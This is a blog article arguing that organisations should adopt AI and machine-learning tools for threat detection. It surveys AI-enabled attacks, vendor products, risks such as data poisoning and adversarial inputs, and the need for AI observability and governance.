Search for content, post, videos

AI-Powered Cybersecurity: Leveraging Machine Learning for Proactive Threat Detection

Every day the attack surface of an organization is changing and most likely growing. In the current 5G-enabled world, edge computing is becoming cheaper and more powerful allowing users to work from anywhere. AI, as well as gaining traction within the network perimeter, is also moving out from the servers behind an organization’s firewall to the chips embedded in the devices on the edge. Combine that with the cultural changes in a post-COVID world and the impact of remote working, and we have a very dynamic environment that poses a challenge for traditional cyber controls, but also for those responsible. An environment where petabytes, of both traditional and AI-enhanced data, are transferred across private and public networks, creates a daunting landscape for cybersecurity professionals.

This data-rich world is now even more accessible to cyber criminals as new AI-enabled strategies facilitated by open-source tooling become available to them. Using AI, a new generation of AI-enhanced attacks ranging from brute-force password attacks which can defeat CAPTCHA to social engineering attacks can now be automated at scale, powered by deep learning and big data. Given that challenge how is the modern CISO, IT manager, or cybersecurity professional meant to keep up?

The answer they must adapt and adopt the new tools that are becoming available. AI-enabled tools can identify patterns and behaviors that traditional rules may not and recognize the attacks that even a seasoned professional may not spot in time.

The Rise of the Large Language Model (LLM)

Thus, what has sparked this step change in the AI debate? LLMs were not the first AI models to be released, or even used in Cybersecurity, but they have taken off like a rocket, since the release of Open AI’s ChatGPT. Transformers, the technology that LLMs have grown from has been around for several years, but Open AI managed a rare feat. They created a highly scalable model, with an intuitive interface, that generalized well, and most importantly caught the public’s imagination. Trained on a wide corpus, collected from the internet, and refined based on human feedback, ChatGPT became the first AI model that really sparked the AI debate and changed the lexicon being considered by regulators.

They also single-handedly created a new job role for budding tech enthusiasts, ML engineers, and red teamers. Prompt Engineering. It quickly became apparent that you could both improve the performance of ChatGPT and exploit using well-crafted prompts. Prompts that could enforce structure and reason or prompts that could change the model’s “personality” and get it to leak sensitive information, hallucinate, or become abusive. Within the space of months, a new technology rose, ushered in a new career path, and simultaneously created a new value chain and vectors for attack.

The open-source community soon burst onto the scene as well releasing a vast array of comparable models. The aim is to advance research and democratize AI. For better or worse, they succeeded. It was not long before researchers trawling the dark web discovered ChatGPT’s dark doppelganger in the form of FraudGPT. A model that to quote a web posting advertised “exclusive tools, features, and capabilities” and “no boundaries.” While Open AI is aligning ChatGPT to prevent harm, the dark web is doing the opposite.

But this is not the only example of a generative AI that has become a threat. Deepfakes for voices and imagery, generative models for creating images based on a prompt, and now multi-modal models, (which use various modes of data, such as images, text, and videos) provide an incredibly versatile toolkit, for an attacker.

This highlights something important; that cybercriminals will be able to now leverage the vast quantities of data available to them to make ever more ingenious attacks, tools, and evolve techniques. Hence, the question becomes as the custodian of cybersecurity, how do you rise to the challenge?

Why is It Needed?

The answer, probably unsurprisingly, is that to detect and deal with these new threats, AI is also the solution. With the release of such powerful, and more generalizable models that can be fine-tuned to multiple use cases, a new arms race has begun. An AI-enabled arms race where data is both a commodity and weapon and AI algorithms and models are the strike teams.

The challenge faced currently is that the problem is often too broad, persistent, and complex to easily be solved by a single team that is meant to monitor activity within a company’s network. They are responsible for all the assets within an organization and must track the interactions that users are having with other systems, correspondences outside the organization, and the states of data and servers.

Add false positives and the reality becomes, not if, but when a cyber-attack is successful and it comes to be clear why many cybersecurity workers are stressed, burnt out, and considering a career change.

This is where AI-enabled threat detection can lighten the load.

The Power of AI

AI models come in many flavors. In the context of cybersecurity, they can be used to classify, predict, generate instructions, or detect and action behaviors. This means that when trying to use an AI-enabled system there is likely a combination of many models that are used to classify that a file is malicious, predict the next node it will infect, generate an instruction set to the system, or deploy an agent to shut down the behavior.

The beauty of these models is that they know what they have learned very well. Over thousands of generations, they have been augmented to be able to perform their task optimally. As such, they can easily identify nuances or patterns that as humans we do not see or discount.

The other flavor of AI is its ability to learn a policy or strategy to outcompete its adversary or achieve a goal in an environment. In its quest to achieve its objective and get a reward, it learns strategies that can contain an attacker or protect a network from an attack. These Reinforcement Learning (RL) models are commonly used as part of cybersecurity tooling, and when combined with rules and command sets for infrastructure can become a key ally.

The thing both these systems share is speed, and generally accuracy. When working in an environment that is controlled and dealing with expected ranges of data these AI-enabled systems can bring the autonomy and insight that traditional rules-based systems may lack, and can be applied to the following areas:

  • Autonomous detection of threats (Darktrace, LogRhythm)
  • Malware detection (Cisco)
  • Spam filters (Proofpoint)
  • Complex patterns of behavior (CrowdStrike)
  • Automation of tasks (JASK)
  • Autonomous endpoint protection (Cylance)

Many of these solutions are available across the providers highlighted above and are also bundled into enterprise-level cyber platforms, which are also provided by systems providers such as IBM, Microsoft, and Google, to name a few.

If we were to add generative AI into the mix, we also have the potential for an incredibly powerful toolchain that can detect threats, maneuver them into desired locations, and use generative AI to keep the attacker busy to learn from the behavior by generating data to keep them interested. A fascinating avenue of research.

The Risks

Unfortunately, that does not mean we are home-free, as with any new piece of software we are introducing a new vector for an adversary.

Data is the most common vector in AI and more so with cyber tools. As well as requiring the infrastructure to maintain data that could be used to train and improve AI models, the data itself can be poisoned, which allows backdoors to be injected into the models that we are relying on. Add to this the domain of Adversarial AI which creates perturbed data or behaviors to invoke failure in AI models, and a new vector is born.

AI can also be incredibly unreliable, as it can only recognize patterns or behaviors they have been trained on. Introduce an adversarial behavior into an attack and an RL agent trained over thousands of generations to defend the kingdom, unlock the gates, and let the invaders in. If an agent is given too much agency this can become a significant risk and another attack vector.

Finally, there is the human aspect. If the AI is good, and we hope it is, we, in time, become over-reliant on it and stop thinking critically about the actions or recommendations it is making.

This is a potential for Generative AI that could be producing code or instruction sets. It is incredibly powerful but will likely be prone to hallucination, or potentially creating insecure code. If we have not implemented procedures to provide oversight for this, then AI is truly in control.

New Challenge Ahead

Therefore, considering these opportunities and risks how do we proceed? Well, now that we are aware of some of the bigger risks this leads us into the responsible adoption and deployment of AI systems.

Not using AI will leave you exposed to those that do, and using it means at best you are freed up to do higher-value work instead of monitoring all your systems in-depth daily.

To adopt AI systems the key things that will prime you for success are; Data, Infrastructure, Education, and Governance.

Implementation leads to the next generation of challenges for cybersecurity professionals. Complex attacks and highly autonomous systems will prove a challenge to interpret for even skilled teams.

  • Phishing attacks are going to change, data used to enable social engineering will become more common, such as voice cloning, knowledge graphs, and natural language.
  • Previously complex attacks will become faster, automated, and more commonplace, making human intervention difficult.
  • Your AI will fail at some point. Alpha Go was defeated by adversarial strategies it had never seen before that confused it and resulted in it making consecutive losing choices.

This means that the ability to detect these sophisticated threats will become ever more important, and the need to have the right level of visibility into your AI-enabled tools will too.

Observability and Governance

This need to understand what the AI is doing is not unusual. As humans, we seek to understand how a system works, and through that understanding, we develop the skills to maintain, fix, and improve.

To achieve this, any AI-enabled threat detection needs to be observable and explainable.

  • Why did it choose to classify one file as a threat and not the other?
  • Why was a certain behavior flagged as a cyber-attack?
  • What were the sets of features in the data it made its decision on?

These are simple questions for you and me to answer, but not as easy for a Blackbox AI. This then leads to other questions about systems that a business may be more interested in:

  • Which AI system is good at what?
  • What was the latest data it was trained on?
  • Does the latest model perform as well as the previous one?

That is a lot of things to track. AI needs its own governance to ensure this information is captured enabling these questions to be answered, but also to align it with the values and objectives that a business requires.

This requires observability of an AI system, and when required explanations, to provide an audit of actions taken. Add to this the advent of global regulations for AI and there also arrives a driver to be able to prove that AI-enabled systems are functioning responsibly.

This further drives the requirement for observability but also the governance of AI systems and data within an organization.

Conclusion

As a result, what is the main takeaway? The threat landscape is evolving, but so is the tooling to help defend against it. The adoption of AI-enabled systems is an obvious choice to help mitigate these challenges and reduce the stress on cybersecurity teams.

However, AI needs to be evaluated and governed so AI adoption must be considered as an organization and to gain the most benefit, organizations must ensure that AI is aligned with the needs, objectives, and controls to avoid it becoming a new vector of attack and cause of failure.

Leave a Reply

Your email address will not be published. Required fields are marked *